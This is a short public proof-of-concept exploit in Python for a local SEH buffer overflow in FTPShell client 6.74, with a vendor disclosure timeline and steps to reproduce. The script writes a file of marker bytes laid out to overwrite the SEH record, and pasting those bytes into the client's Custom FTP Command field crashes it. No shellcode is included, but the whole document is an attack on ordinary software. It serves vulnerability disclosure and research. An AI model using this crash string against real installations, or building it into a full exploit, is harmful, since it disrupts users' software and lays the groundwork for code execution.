#!/usr/bin/python  
  
  
# Exploit Type : DOS  
# Exploit Title: FTPShell client 6.74 - Local Buffer Overflow (SEH)  
# Vulnerable Software & version : FTPShell client 6.74  
# Vendor Homepage: https://www.ftpshell.com/  
# Software Link: https://www.ftpshell.com/downloadclient.htm  
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7 Professional SP1(32-bit)
# Exploit Author: Debashis Pal  
# Timeline  
# Vulnerability Discovery Date: 03-Sep-2019
# Vulnerability Reported to Vendor: 03-Sep-2019, no response
# Emailed Vendor Again: 05-Sep-2019, no response
# Public Disclosure: 09-Sep-2019
  
  
# PoC  
# 1. Generate FTPShellclient6-74POC.txt from the POC.py code, open it in Notepad (FTPShellclient6-74POC.txt) and copy the contents
# 2. Open Core FTPShell client 6.74 & connect to an FTP server (FTPShell client 6.74, i.e. the FTP session needs to be active along with username & password)
# 3. From the FTPShell client 6.74 menu bar select Tools -> Custom FTP Command
# 4. Paste the contents from Notepad (into the "Custom FTP Command" input field)
# 5. The application will crash and the SEH is overwritten
  
  
  
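# Marker bytes only: each region uses a distinct letter so it is easy to identify in a debugger.
crash = "\x41" * 396  # Junk
crash += "\x43" * 4   # nSEH
crash += "\x42" * 4   # SEH
crash += "\x44" * 96  # More Junk


file = "FTPShellclient6-74POC.txt"
# Write the test string; the with-block flushes and closes the file.
with open(file, "w") as generate:
    generate.write(crash)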
  
  
Attachment: Application crash and SEH overwritten.jpg
  
  
Thanks.